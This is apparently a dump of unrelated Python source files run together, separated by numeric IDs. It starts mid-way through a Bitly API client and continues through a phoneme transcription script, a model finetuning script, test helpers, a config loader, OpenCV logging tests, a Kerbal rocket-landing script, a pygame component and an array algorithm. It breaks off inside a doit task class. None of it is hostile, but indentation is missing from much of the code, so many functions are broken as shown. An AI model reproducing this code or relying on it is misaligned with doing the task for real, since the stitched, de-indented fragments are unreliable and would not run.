data = self._call(self.host, 'v3/lookup', params, self.secret)
return data['data']['lookup']
def user_link_edit(self, link, edit, title=None, note=None, private=None,
user_ts=None, archived=None):
"""edit a link in a user's history"""
params = dict()
if not link:
raise BitlyError(500, 'MISSING_ARG_LINK')
if not edit:
raise BitlyError(500, 'MISSING_ARG_EDIT')
params['link'] = link
params['edit'] = edit
if title is not None:
params['title'] = str(title)
if note is not None:
params['note'] = str(note)
if private is not None:
params['private'] = bool(private)
if user_ts is not None:
params['user_ts'] = user_ts
if archived is not None:
params['archived'] = archived
data = self._call_oauth2("v3/user/link_edit", params)
return data['link_edit']
def user_link_lookup(self, url):
"""
query for whether a user has shortened a particular long URL. don't
confuse with v3/link/lookup.
"""
params = dict(url=url)
data = self._call(self.host, 'v3/user/link_lookup', params,
self.secret)
return data['data']['link_lookup']
def user_link_save(self, longUrl=None, long_url=None, title=None,
note=None, private=None, user_ts=None):
"""save a link into the user's history"""
params = dict()
if not longUrl and not long_url:
            raise BitlyError(500, 'MISSING_ARG_LONG_URL')
params['longUrl'] = longUrl or long_url
if title is not None:
params['title'] = str(title)
if note is not None:
params['note'] = str(note)
if private is not None:
params['private'] = bool(private)
if user_ts is not None:
params['user_ts'] = user_ts
data = self._call_oauth2("v3/user/link_save", params)
return data['link_save']
def pro_domain(self, domain):
""" is the domain assigned for bitly.pro? """
end_point = 'v3/bitly_pro_domain'
if not domain:
raise BitlyError(500, 'MISSING_ARG_DOMAIN')
protocol_prefix = ('http://', 'https://')
if domain.lower().startswith(protocol_prefix):
raise BitlyError(500, 'INVALID_BARE_DOMAIN')
params = dict(domain=domain)
data = self._call(self.host, end_point, params, self.secret)
return data['data']['bitly_pro_domain']
def bundle_archive(self, bundle_link):
"""archive a bundle for the authenticated user"""
params = dict(bundle_link=bundle_link)
data = self._call_oauth2_metrics("v3/bundle/archive", params)
return data
def bundle_bundles_by_user(self, user=None, expand_user=False):
"""list bundles by user (defaults to authed user)"""
params = dict()
if user is not None:
params["user"] = user
if expand_user is True:
params["expand_user"] = "true"
data = self._call_oauth2_metrics("v3/bundle/bundles_by_user", params)
return data
def bundle_clone(self, bundle_link): # TODO: 500s
"""clone a bundle for the authenticated user"""
params = dict(bundle_link=bundle_link)
data = self._call_oauth2_metrics("v3/bundle/clone", params)
return data
def bundle_collaborator_add(self, bundle_link, collaborator=None):
"""add a collaborator a bundle"""
params = dict(bundle_link=bundle_link)
if collaborator is not None:
params["collaborator"] = collaborator
data = self._call_oauth2_metrics("v3/bundle/collaborator_add", params)
return data
def bundle_collaborator_remove(self, bundle_link, collaborator):
"""remove a collaborator from a bundle"""
params = dict(bundle_link=bundle_link)
params["collaborator"] = collaborator
data = self._call_oauth2_metrics("v3/bundle/collaborator_remove",
params)
return data
def bundle_contents(self, bundle_link, expand_user=False):
"""list the contents of a bundle"""
params = dict(bundle_link=bundle_link)
if expand_user:
params["expand_user"] = "true"
data = self._call_oauth2_metrics("v3/bundle/contents", params)
return data
def bundle_create(self, private=False, title=None, description=None):
"""create a bundle"""
params = dict()
if private:
params["private"] = "true"
if title is not None:
assert isinstance(title, string_types)
params["title"] = title
if description is not None:
assert isinstance(description, string_types)
params["description"] = description
data = self._call_oauth2_metrics("v3/bundle/create", params)
return data
def bundle_edit(self, bundle_link, edit=None, title=None, description=None,
private=None, preview=None, og_image=None):
"""edit a bundle for the authenticated user"""
params = dict(bundle_link=bundle_link)
if edit:
assert isinstance(edit, string_types)
params["edit"] = edit
if title:
assert isinstance(title, string_types)
params["title"] = title
if description:
assert isinstance(description, string_types)
params["description"] = description
if private is not None:
if private:
params["private"] = "true"
else:
params["private"] = "false"
if preview is not None:
if preview:
params["preview"] = "true"
else:
params["preview"] = "false"
if og_image:
assert isinstance(og_image, string_types)
params["og_image"] = og_image
data = self._call_oauth2_metrics("v3/bundle/edit", params)
return data
def bundle_link_add(self, bundle_link, link, title=None):
"""add a link to a bundle"""
params = dict(bundle_link=bundle_link, link=link)
if title:
assert isinstance(title, string_types)
params["title"] = title
data = self._call_oauth2_metrics("v3/bundle/link_add", params)
return data
def bundle_link_comment_add(self, bundle_link, link, comment):
"""add a comment to a link in a bundle"""
params = dict(bundle_link=bundle_link, link=link, comment=comment)
data = self._call_oauth2_metrics("v3/bundle/link_comment_add", params)
return data
def bundle_link_comment_edit(self, bundle_link, link, comment_id, comment):
"""edit a comment on a link in a bundle"""
params = dict(bundle_link=bundle_link, link=link,
comment_id=comment_id, comment=comment)
data = self._call_oauth2_metrics("v3/bundle/link_comment_edit", params)
return data
def bundle_link_comment_remove(self, bundle_link, link, comment_id):
""" remove a comment on a link in a bundle"""
params = dict(bundle_link=bundle_link, link=link,
comment_id=comment_id)
data = self._call_oauth2_metrics("v3/bundle/link_comment_remove",
params)
return data
def bundle_link_edit(self, bundle_link, link, edit, title=None,
preview=None):
""" edit the title for a link """
params = dict(bundle_link=bundle_link, link=link)
if edit == "title":
params["edit"] = edit
assert isinstance(title, string_types)
params["title"] = title
elif edit == "preview":
params["edit"] = edit
assert isinstance(preview, bool)
if preview:
params["preview"] = "true"
else:
params["preview"] = "false"
else:
raise BitlyError(500,
"PARAM EDIT MUST HAVE VALUE TITLE OR PREVIEW")
data = self._call_oauth2_metrics("v3/bundle/link_edit", params)
return data
def bundle_link_remove(self, bundle_link, link):
""" remove a link from a bundle """
params = dict(bundle_link=bundle_link, link=link)
data = self._call_oauth2_metrics("v3/bundle/link_remove", params)
return data
def bundle_link_reorder(self, bundle_link, link, display_order):
""" reorder the links in a bundle"""
params = dict(bundle_link=bundle_link, link=link,
display_order=display_order)
data = self._call_oauth2_metrics("v3/bundle/link_reorder", params)
return data
def bundle_pending_collaborator_remove(self, bundle_link, collaborator):
"""remove a pending collaborator from a bundle"""
params = dict(bundle_link=bundle_link)
params["collaborator"] = collaborator
data = self._call_oauth2_metrics(
"v3/bundle/pending_collaborator_remove", params)
return data
def bundle_view_count(self, bundle_link):
""" get the number of views on a bundle """
params = dict(bundle_link=bundle_link)
data = self._call_oauth2_metrics("v3/bundle/view_count", params)
return data
def user_bundle_history(self):
""" return the bundles that this user has access to """
data = self._call_oauth2_metrics("v3/user/bundle_history", dict())
return data
def highvalue(self, limit=10, lang='en'):
params = dict(lang=lang)
data = self._call_oauth2_metrics("v3/highvalue", params, limit=limit)
return data
def realtime_bursting_phrases(self):
data = self._call_oauth2_metrics("v3/realtime/bursting_phrases",
dict())
return data["phrases"]
def realtime_hot_phrases(self):
data = self._call_oauth2_metrics("v3/realtime/hot_phrases", dict())
return data["phrases"]
def realtime_clickrate(self, phrase):
params = dict(phrase=phrase)
data = self._call_oauth2_metrics("v3/realtime/clickrate", params)
return data["rate"]
def link_info(self, link):
params = dict(link=link)
data = self._call_oauth2_metrics("v3/link/info", params)
return data
def link_content(self, link, content_type="html"):
params = dict(link=link, content_type=content_type)
data = self._call_oauth2_metrics("v3/link/content", params)
return data["content"]
def link_category(self, link):
params = dict(link=link)
data = self._call_oauth2_metrics("v3/link/category", params)
return data["categories"]
def link_social(self, link):
params = dict(link=link)
data = self._call_oauth2_metrics("v3/link/social", params)
return data["social_scores"]
def link_location(self, link):
params = dict(link=link)
data = self._call_oauth2_metrics("v3/link/location", params)
return data["locations"]
def link_language(self, link):
params = dict(link=link)
data = self._call_oauth2_metrics("v3/link/language", params)
return data["languages"]
def search(self, query, offset=None, cities=None, domain=None, fields=None,
limit=10, lang='en'):
params = dict(query=query, lang=lang)
if offset:
assert isinstance(offset, integer_types)
params["offset"] = str(offset)
if cities: # TODO: check format
assert isinstance(cities, string_types)
params["cities"] = cities
if domain:
assert isinstance(domain, string_types)
params["domain"] = domain
if fields:
assert isinstance(fields, string_types)
params["fields"] = fields
data = self._call_oauth2_metrics("v3/search", params, limit=limit)
return data['results']
    @classmethod
    def _generateSignature(cls, params, secret):
if not params or not secret:
return ""
hash_string = ""
if not params.get('t'):
# note, this uses a utc timestamp not a local timestamp
params['t'] = str(int(time.mktime(time.gmtime())))
        keys = sorted(params.keys())  # dict views have no .sort() in Python 3
        for k in keys:
            if isinstance(params[k], (list, tuple)):
                for v in params[k]:
                    hash_string += v
            else:
                hash_string += params[k]
        hash_string += secret
        # hashlib.md5 requires bytes on Python 3; _utf8 encodes on both versions
        signature = hashlib.md5(_utf8(hash_string)).hexdigest()[:10]
return signature
def _call_oauth2_metrics(self, endpoint, params, unit=None, units=None,
tz_offset=None, rollup=None, limit=None,
unit_reference_ts=None):
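        # validate and normalize the common metrics query parameters before
        # delegating to the generic OAuth2 call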
if unit is not None:
assert unit in ("minute", "hour", "day", "week", "mweek", "month")
params["unit"] = unit
if units is not None:
assert isinstance(units, integer_types), \
"Unit (%r) must be integer" % units
params["units"] = units
if tz_offset is not None:
# tz_offset can either be a hour offset, or a timezone like
# North_America/New_York
if isinstance(tz_offset, integer_types):
msg = "integer tz_offset must be between -12 and 12"
assert -12 <= tz_offset <= 12, msg
else:
assert isinstance(tz_offset, string_types)
params["tz_offset"] = tz_offset
if rollup is not None:
assert isinstance(rollup, bool)
params["rollup"] = "true" if rollup else "false"
if limit is not None:
assert isinstance(limit, integer_types)
params["limit"] = limit
if unit_reference_ts is not None:
assert (unit_reference_ts == 'now' or
isinstance(unit_reference_ts, integer_types))
params["unit_reference_ts"] = unit_reference_ts
return self._call_oauth2(endpoint, params)
def _call_oauth2(self, endpoint, params):
assert self.access_token, "This %s endpoint requires OAuth" % endpoint
return self._call(self.ssl_host, endpoint, params)["data"]
def _call(self, host, method, params, secret=None, timeout=5000):
params['format'] = params.get('format', 'json') # default to json
if self.access_token:
scheme = 'https'
params['access_token'] = self.access_token
host = self.ssl_host
else:
scheme = 'http'
params['login'] = self.login
params['apiKey'] = self.api_key
if secret:
params['signature'] = self._generateSignature(params, secret)
# force to utf8 to fix ascii codec errors
params = _utf8_params(params)
request = "%(scheme)s://%(host)s/%(method)s?%(params)s" % {
'scheme': scheme,
'host': host,
'method': method,
'params': urlencode(params, doseq=1)
}
try:
opener = build_opener(DontRedirect())
opener.addheaders = [('User-agent', self.user_agent + ' urllib')]
response = opener.open(request)
code = response.code
result = response.read().decode('utf-8')
if code != 200:
raise BitlyError(500, result)
if not result.startswith('{'):
raise BitlyError(500, result)
data = json.loads(result)
if data.get('status_code', 500) != 200:
raise BitlyError(data.get('status_code', 500),
data.get('status_txt', 'UNKNOWN_ERROR'))
return data
except URLError as e:
raise BitlyError(500, str(e))
except HTTPError as e:
raise BitlyError(e.code, e.read())
except BitlyError:
raise
except Exception:
raise BitlyError(None, sys.exc_info()[1])
|
157801
|
from russian_g2p import Grapheme2Phoneme
from russian_g2p import Accentor
import json
import codecs
with open('/home/a117/Документы/Linguistics/russian_g2p/corpus/wordlist') as wordlist_file:
    words = wordlist_file.readlines()
# words = ['я']
# acc = Accentor()
g2p = Grapheme2Phoneme()
new_simple_words = {}
with open('new', 'w') as f:
for word in words:
word = word.strip()
'''
print(word)
res, added_simple_words = acc.do_accents([word])
new_simple_words = {**new_simple_words, **added_simple_words}
if len(res) != 1:
print('word has many vars', res)
word2transcribe = word
else:
print('word has one var', res)
word2transcribe = res[0][0]
print(word2transcribe)
'''
word2transcribe = word # Daniil
transcriptions = g2p.phrase_to_phonemes(word2transcribe)
# print('{} {}\n'.format(word, ' '.join(transcriptions)))
        f.write('{} {}\n'.format(word, ' '.join(transcriptions)))
#with codecs.open('new_simple_words.json', mode='w', encoding='utf-8', errors='ignore') as fp:
# data = json.dump(new_simple_words, fp)
|
157804
|
from gamechangerml.src.search.sent_transformer.finetune import STFinetuner
from gamechangerml.configs.config import EmbedderConfig
from gamechangerml.api.utils.pathselect import get_model_paths
from gamechangerml.api.utils.logger import logger
import argparse
import os
from datetime import datetime
model_path_dict = get_model_paths()
LOCAL_TRANSFORMERS_DIR = model_path_dict["transformers"]
BASE_MODEL_NAME = EmbedderConfig.BASE_MODEL
def main(data_path, model_load_path, model_save_path):
tuner = STFinetuner(model_load_path=model_load_path, model_save_path=model_save_path, **EmbedderConfig.FINETUNE)
return tuner.retrain(data_path)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Finetuning the sentence transformer model")
parser.add_argument(
"--data-path", "-d",
dest="data_path",
required=True,
help="path to csv with finetuning data"
)
parser.add_argument(
"--model-load-path", "-m",
dest="model_load_path",
required=False,
help="path to load model for fine-tuning"
)
parser.add_argument(
"--model-save-path", "-s",
dest="model_save_path",
required=False,
help="path to save model after fine-tuning"
)
args = parser.parse_args()
## getting default paths
if args.model_load_path:
model_load_path = args.model_load_path
else:
model_load_path = os.path.join(LOCAL_TRANSFORMERS_DIR, BASE_MODEL_NAME)
if args.model_save_path:
model_save_path = args.model_save_path
else:
model_save_path = model_load_path + str(datetime.now().strftime("%Y%m%d"))
data_path = args.data_path
logger.info("\n|---------------------Beginning to finetune model-----------------------|")
main(data_path, model_load_path, model_save_path)
logger.info("|------------------------Done finetuning model--------------------------|\n")
|
157819
|
from typing import Callable, Dict, Iterable, Optional, Tuple, Type
from urllib.parse import parse_qs, urlparse
import pytest
from rest_registration.utils.signers import URLParamsSigner
from tests.helpers.timer import Timer
def assert_valid_verification_url(
url: str,
expected_path: Optional[str] = None,
        expected_fields: Optional[Iterable[str]] = None,
url_parser: Optional[Callable[
[str, Optional[Iterable[str]]],
Tuple[str, Dict[str, str]]]] = None,
timer: Optional[Timer] = None,
signer_cls: Optional[Type[URLParamsSigner]] = None,
):
url_parser_ = url_parser if url_parser is not None else _parse_verification_url
try:
url_path, verification_data = url_parser_(url, expected_fields)
except ValueError as exc:
pytest.fail(str(exc))
if expected_path is not None:
assert url_path == expected_path
if expected_fields is not None:
assert set(verification_data.keys()) == set(expected_fields)
if timer is not None:
url_sig_timestamp = int(verification_data['timestamp'])
assert timer.start_time <= url_sig_timestamp <= timer.end_time
if signer_cls is not None:
signer = signer_cls(verification_data)
signer.verify()
return verification_data
def _parse_verification_url(
url: str,
verification_field_names: Optional[Iterable[str]],
) -> Tuple[str, Dict[str, str]]:
parsed_url = urlparse(url)
query = parse_qs(parsed_url.query, strict_parsing=True)
for key, values in query.items():
if not values:
raise ValueError("no values for '{key}".format(key=key))
if len(values) > 1:
raise ValueError("multiple values for '{key}'".format(key=key))
verification_data = {key: values[0] for key, values in query.items()}
return parsed_url.path, verification_data
|
157822
|
from civil_registry.models import Citizen
from register.models import SMS
# Ripped from the DB but with some capitalization.
CARRIER_CODING = {2: 'Libyana',
3: 'AlMadar',
4: 'Thuraya'}
# The code could be refactored further to allow mixed case
# string values as in SMS.DIRECTION_CHOICES.
MESSAGE_DIRECTION = dict([(direction_value, direction_string.lower())
for direction_value, direction_string
in SMS.DIRECTION_CHOICES])
MESSAGE_TYPES = dict(SMS.MESSAGE_TYPES)
GENDER_CODING = dict(Citizen.GENDERS)
AGE_RANGES = [(18, 29), (30, 39), (40, 49), (50, 59), (60, None)]
AGE_CODING = {}
for (low, high) in AGE_RANGES:
if high is None:
key = '{}+'.format(low)
high = 200
else:
key = '{}-{}'.format(low, high)
for i in range(low, high + 1):
AGE_CODING[i] = key
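# The resulting lookup maps every age to its bucket label, e.g.
# AGE_CODING[18] == '18-29', AGE_CODING[45] == '40-49' and AGE_CODING[75] == '60+'.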
|
157846
|
import yaml
# Default settings, used to fill in missing config keys
default_config = {
'debug_mode': False,
'save_manifest_file': True,
'output_path': './output',
'proxy': None,
'downloader_max_connection_number': 5,
'downloader_max_retry_number': 5,
'friendly_console_output': False,
'header': {
'referer': 'https://manhua.dmzj.com/',
'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.167 Safari/537.36'
},
}
config = {}
def load(text):
global config
    config = yaml.safe_load(text)
def load_file(file_path):
with open(file_path) as f:
load(f.read())
def get(key, fallback=False):
    keys = key.split('.')
    target = default_config if fallback else config
    for k in keys:
        target = target.get(k)
        if target is None:
            # missing intermediate key: stop before calling .get on None
            break
    if target is None and not fallback:
        target = get(key, fallback=True)
    return target
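# Usage sketch (hypothetical YAML): get() walks the nested dicts and falls
# back to the same dotted path in default_config when the key is absent:
#
#     load('output_path: ./custom')
#     get('output_path')       # -> './custom'
#     get('header.referer')    # -> 'https://manhua.dmzj.com/' (from defaults)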
|
157884
|
import cvlog as log
import cv2
import numpy as np
from .utils import read_file, remove_dirs, get_html
def test_log_image():
remove_dirs('log/')
img = cv2.imread("tests/data/orange.png")
log.set_mode(log.Mode.LOG)
log.image(log.Level.ERROR, img)
logitem = get_html('log/cvlog.html').select('.log-list .log-item')
assert logitem[0].select('.log-type')[0].text == 'image'
assert logitem[0]['logdata'] == read_file('tests/data/expected/image.txt')
def test_log_edges():
remove_dirs('log/')
img = cv2.imread('tests/data/sudoku.png')
log.set_mode(log.Mode.LOG)
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
edges = cv2.Canny(gray, 50, 150, apertureSize=3)
log.edges(log.Level.ERROR, edges)
logitem = get_html('log/cvlog.html').select('.log-list .log-item')
assert logitem[0].select('.log-type')[0].text == 'edges'
assert logitem[0]['logdata'] == read_file('tests/data/expected/edges.txt')
def test_log_threshold():
remove_dirs('log/')
img = cv2.imread('tests/data/board.jpg')
log.set_mode(log.Mode.LOG)
imgray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
ret, thresh = cv2.threshold(imgray, 127, 255, 0)
log.threshold(log.Level.ERROR, thresh)
logitem = get_html('log/cvlog.html').select('.log-list .log-item')
assert logitem[0].select('.log-type')[0].text == 'threshold'
assert logitem[0]['logdata'] == read_file('tests/data/expected/thershold.txt')
def test_log_hough_lines():
remove_dirs('log/')
img = cv2.imread('tests/data/sudoku.png')
log.set_mode(log.Mode.LOG)
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
edges = cv2.Canny(gray, 50, 150, apertureSize=3)
lines = cv2.HoughLines(edges, 1, np.pi / 180, 200)
log.hough_lines(log.Level.ERROR, lines, img)
logitem = get_html('log/cvlog.html').select('.log-list .log-item')
assert logitem[0].select('.log-type')[0].text == 'hough lines'
assert logitem[0]['logdata'] == read_file('tests/data/expected/houghline_img.txt')
def test_log_hough_circles():
remove_dirs('log/')
img = cv2.imread('tests/data/board.jpg')
log.set_mode(log.Mode.LOG)
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
blur = cv2.medianBlur(gray, 5)
circles = cv2.HoughCircles(blur, cv2.HOUGH_GRADIENT, 1, 10, np.array([]), 100, 30, 1, 30)
log.hough_circles(log.Level.ERROR, circles, img)
logitem = get_html('log/cvlog.html').select('.log-list .log-item')
assert logitem[0].select('.log-type')[0].text == 'hough circles'
assert logitem[0]['logdata'] == read_file('tests/data/expected/houghcircle_img.txt')
def test_contours():
remove_dirs('log/')
img = cv2.imread('tests/data/contour.jpg')
log.set_mode(log.Mode.LOG)
imgray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
ret, thresh = cv2.threshold(imgray, 127, 255, 0)
contours, hierarchy = cv2.findContours(thresh, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
log.contours(log.Level.ERROR, contours, img)
logitem = get_html('log/cvlog.html').select('.log-list .log-item')
assert logitem[0].select('.log-type')[0].text == 'contours'
assert logitem[0]['logdata'] == read_file('tests/data/expected/contour.txt')
def test_keypoints():
remove_dirs('log/')
img = cv2.imread('tests/data/orange.png')
log.set_mode(log.Mode.LOG)
gray_img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
orb = cv2.ORB_create()
kp, _ = orb.detectAndCompute(gray_img, None)
log.keypoints(log.Level.ERROR, kp, img, flags=cv2.DRAW_MATCHES_FLAGS_DRAW_RICH_KEYPOINTS)
logitem = get_html('log/cvlog.html').select('.log-list .log-item')
assert logitem[0].select('.log-type')[0].text == 'key points'
print(logitem[0]['logdata'])
    # assert logitem[0]['logdata'] == read_file('tests/data/expected/keypoints.txt')  # TODO: fix CircleCI issue
def test_message():
remove_dirs('log/')
img = cv2.imread('tests/data/contour.jpg')
log.set_mode(log.Mode.LOG)
imgray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
ret, thresh = cv2.threshold(imgray, 127, 255, 0)
contours, hierarchy = cv2.findContours(thresh, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
message = 'Lorem ipsum dolor sit amet, ne persius reprehendunt mei. Ea summo elitr munere his, et consul offendit recteque sea, quis elit nam ut.'
log.image(log.Level.ERROR, img)
log.contours(log.Level.ERROR, contours, img, msg=message)
logitem = get_html('log/cvlog.html').select('.log-list .log-item')
assert logitem[0].select('.description') == []
assert logitem[1].select('.description')[0].text == message
|
157964
|
import krpc
import time
conn = krpc.connect(name="UI Test")
vessel = conn.space_center.active_vessel
kerbin_frame = vessel.orbit.body.reference_frame
orb_frame = vessel.orbital_reference_frame
srf_frame = vessel.surface_reference_frame
surface_gravity = vessel.orbit.body.surface_gravity
current_roll = conn.add_stream(getattr, vessel.flight(), 'roll')
current_pitch = conn.add_stream(getattr, vessel.flight(), 'pitch')
current_heading = conn.add_stream(getattr, vessel.flight(), 'heading')
current_alt = conn.add_stream(getattr, vessel.flight(), 'surface_altitude')
current_apo = conn.add_stream(getattr, vessel.orbit, 'apoapsis_altitude')
current_per = conn.add_stream(getattr, vessel.orbit, 'periapsis_altitude')
lowest = conn.add_stream(vessel.bounding_box, srf_frame)
bottom_alt = max(0, int(current_alt() - abs(lowest()[0][0])))
def engine_amount(number_of_engines):
if number_of_engines == 1:
vessel.control.toggle_action_group(1)
vessel.control.toggle_action_group(3)
elif number_of_engines == 3:
vessel.control.toggle_action_group(1)
vessel.control.toggle_action_group(2)
elif number_of_engines == 9:
vessel.control.toggle_action_group(4)
else:
print(f"Not a Valid Engine Request")
def twr():
return vessel.thrust / (vessel.mass * surface_gravity)
engine_amount(9)
vessel.control.throttle = 1
vessel.control.activate_next_stage()
vessel.control.activate_next_stage()
vessel.auto_pilot.engage()
vessel.auto_pilot.target_pitch = 85
vessel.auto_pilot.target_heading = 270
vessel.auto_pilot.target_roll = 0
while current_apo() < 10000:
if twr() > 3:
vessel.control.throttle -= .1
elif twr() <= 2:
vessel.control.throttle += .1
time.sleep(.1)
vessel.control.throttle = 0
vessel.auto_pilot.disengage()
vessel.control.sas = True
vessel.control.rcs = True
time.sleep(.1)
vessel.control.sas_mode = conn.space_center.SASMode.prograde
while vessel.flight(kerbin_frame).vertical_speed > 0:
time.sleep(1)
time.sleep(5)
vessel.control.sas_mode = conn.space_center.SASMode.retrograde
vessel.control.brakes = True
engine_amount(3)
while current_alt() > 1250:
time.sleep(.1)
vessel.control.throttle = 1
while vessel.flight(kerbin_frame).vertical_speed < -50:
time.sleep(.1)
vessel.control.gear = True
while max(0, int(current_alt() - abs(lowest()[0][0]))) > 10:
if vessel.flight(kerbin_frame).vertical_speed < -5:
vessel.control.throttle += .1
else:
vessel.control.throttle -= .1
time.sleep(.05)
vessel.control.throttle = 0
# throttle < 10 and TWR > 2
# Go to 3 engines
|
158006
|
from .config import Config
from .lsi_text import Text
class LsiVisualTransforms():
def __init__(self):
"""
Visual Transforms (for item).
e.g. set color, set indent.
"""
# Set Config
self.config = Config()
def _add_indent_to_new_line(self, item, prev_status):
"""
Visual transform for Description.
Add indent to new line. \n -> \n____
Parameters
----------
item : Dict
prev_status : Boolean
Returns
-------
status : Boolean
item : Dict
"""
if 'description' not in item.keys():
status = 1
return status, item
indent_length = 3 * (item['depth']+1)
base_name = item['path']
description = item['description'].text
blank = '│' + ' '*int(indent_length + len(item['path']) + 3)
description = description.split('\n')
for i, desc in enumerate(description[::-1]):
if not (set(' ') == set(desc) or set('') == set(desc)):
break
description = description[:len(description) - i]
item['description'].text = '\n'.join(description)
if len(description)>=2:
insert_count = 0
for desc in description[:-1]:
insert_count += len(desc)+1
item['description'].insert_text(blank, insert_count)
item['description'].insert_style(';nl;', insert_count)
item['description'].insert_style(';nle;', insert_count+len(blank))
insert_count += len(blank)
status = 0
return status, item
def _select_indent_head(self, item, place):
"""
Select indent head ├,└
Parameters
----------
item : Dict
place : Int
0 if item is not last of children
1 if item is last of children
Returns
-------
head : String (├ or └)
item : Dict
"""
if place==0:
return '├', item
if place==1:
if 'description' in item.keys():
item['description'].text = item['description'].text.replace('│', ' ')
return '└', item
if place==2:
return '', item
def _concat_item(self, item, place):
"""
Concatenate all texts.
Output final string like below.
'file name / description\n
new line description'
Parameters
----------
item : Dict
        place : Int
Returns
-------
status : Boolean
output : String
"""
head, item = self._select_indent_head(item, place)
if 'description' in item.keys():
description = item['description']
else:
description = Text(item['type'], ';w;')
indent = head+' '*3*item['depth'] + self.config.indent
if place==2:
output = description.render()
else:
output = indent + item['path'].render() + ' / ' + description.render()
status = 0
return status, output
def run(self, item, condition):
"""
        Apply visual transforms to an item.
Parameters
----------
item : Dict
condition : Dict
Returns
-------
status : Boolean
0 == success
1 == failed
output : String
            A visualized item.
This will be printed to the terminal.
"""
prev_status = condition['status']
transforms = []
if condition['is_last']!=2:
transforms += [self._add_indent_to_new_line]
for tr in transforms:
prev_status, item = tr(item, prev_status)
status, output = self._concat_item(item, condition['is_last'])
return status, output
|
158023
|
import os
import sys
from JciHitachi import __author__, __version__
git_repo_path = os.path.abspath(os.path.dirname(os.path.dirname(__file__)))
requirements_txt_path = os.path.join(git_repo_path, "requirements.txt")
requirements_test_txt_path = os.path.join(git_repo_path, "requirements_test.txt")
sys.path.append(git_repo_path)
sys.path.append(os.path.join(git_repo_path, "docs", "source"))
import conf
from setup import install_requires, tests_require
class TestSanity:
    def test_annotations_consistency(self):
assert __author__ == conf.author
assert f"v{__version__}" == conf.release
def test_install_requirements_consistency(self):
with open(requirements_txt_path, 'r', encoding='utf-8') as f:
req_txt = f.read().split('\n')
assert set(install_requires) == set(req_txt)
def test_test_requirements_consistency(self):
with open(requirements_test_txt_path, 'r', encoding='utf-8') as f:
req_txt = f.read().split('\n')
assert set(tests_require) == set(req_txt)
|
158037
|
import pygame
from .component import Component
from .colours import *
class EmoteComponent(Component):
def __init__(self,
# required parameters
image,
# optional parameters
timed=True,
timer=200,
):
self.key = 'emote'
# store the passed parameters
self.image = image
self.timed = timed
self.timer = timer
# set additional component properties
self.bottomMargin = 10
self.imagePadding = 2
self.destroy = False
def update(self):
# decrement timer
if self.timed:
self.timer -= 1
# destroy if timer reaches 0
if self.timer <= 0:
self.destroy = True
|
158068
|
from collections import defaultdict
import sys
def subArraylen(arr, n, K):
    # map each prefix sum to the latest index where it occurs
    mp = defaultdict(lambda: 0)
    mp[arr[0]] = 0
    # convert arr into its prefix-sum array in place
    for i in range(1, n):
        arr[i] = arr[i] + arr[i - 1]
        mp[arr[i]] = i
    ln = sys.maxsize
    for i in range(n):
        # with positive elements, a prefix sum below K cannot end a
        # subarray summing to K
        if arr[i] < K:
            continue
        x = arr[i] - K
        if x == 0:
            # the whole prefix [0..i] sums to K
            ln = min(ln, i + 1)
        elif x in mp:
            # the subarray after index mp[x] up to i sums to K
            ln = min(ln, i - mp[x])
    return ln
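# Worked example: for arr = [2, 4, 6, 10, 2, 1] and K = 12 the prefix sums
# are [2, 6, 12, 22, 24, 25]; at i = 4 the prefix 24 minus K leaves 12,
# last seen at index 2, so the subarray (10, 2) of length 4 - 2 = 2 is the
# shortest one summing to K.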
arr = []
n = int(input("enter the number of elements"))
for i in range(0, n):
ele = int(input("enter the elements"))
arr.append(ele)
K = int(input("enter the sum "))
ln = subArraylen(arr, n, K)
if(ln == sys.maxsize):
print("-1")
else:
print(ln)
# Time complexity: O(N)
# Space Complexity: O(N)
'''
Output:
enter the number of elements6
enter the elements2
enter the elements4
enter the elements6
enter the elements10
enter the elements2
enter the elements1
enter the sum 12
2
'''
|
158074
|
import pandas as pd
from .paramdb import *
from .file import *
from .utils import *
from doit.tools import run_once
def print_nested_df(orig):
dfs = [None]
def dedf(x):
if isinstance(x, pd.DataFrame):
i = len(dfs)
dfs.append(x)
return f"df{i}"
return x
dfs[0] = orig.applymap(dedf)
for i, df in enumerate(dfs):
print(f"df{i}:\n", df)
def get_file_paths(pdb_row, file_key):
return pdb_row[file_key]['path'].tolist()
class Task(object):
"""Base Task"""
@classmethod
def create_doit_tasks(cls):
show_details = 0
if show_details:
print(f"\n=================== Working on {cls} =============\n")
if cls is Task:
return # avoid create tasks from base class 'Task'
# Build a dictionary from the class variables
kw = dict((a, getattr(cls, a)) for a in dir(cls) if not a.startswith('_'))
# We are interested only in few class variables
kw = {k:v for k,v in kw.items() if k in ['param', 'mask', 'mask_row', 'keep', 'inputs', 'targets', 'run', 'actions']}
kw['doc'] = cls.__doc__
kw['basename'] = cls.__name__
kw['clean'] = True
kw['verbosity'] = 2
global JUDI_PARAM
param = (kw.pop('param') if 'param' in kw else JUDI_PARAM).copy()
mask = kw.pop('mask') if 'mask' in kw else None
if mask: param.mask(mask)
mask_row = kw.pop('mask_row') if 'mask_row' in kw else None
if mask_row: param.query(mask_row)
keep = kw.pop('keep') if 'keep' in kw else None
if keep: param.keep(keep)
# A JUDI task must define targets and optionally inputs
targets = kw.pop('targets')
file_dicts = [targets]
inputs = None
if 'inputs' in kw:
inputs = kw.pop('inputs')
file_dicts += [inputs]
cfg_cols = param.df.columns.tolist()
cfg_cols_wo_spl = list(filter(lambda x: x != 'JUDI', cfg_cols))
def engroup(x, cols):
#print(x)
#we need to reindex the dataframe, otherwise it gives some error
return pd.DataFrame({fkey:[x.drop(cols, axis='columns').reindex()]})
# TODO: make sure that none of the parameter values is NaN
# For each input/target file f create D_{t,f} table
# and merge the information to the param.df db
for files in file_dicts:
for fkey in files.keys():
#print("============", fkey, "=============")
grp_cols = list(filter(lambda x: x in cfg_cols, files[fkey].param.df.columns))
#print(grp_cols)
#print(files[fkey].param.df)
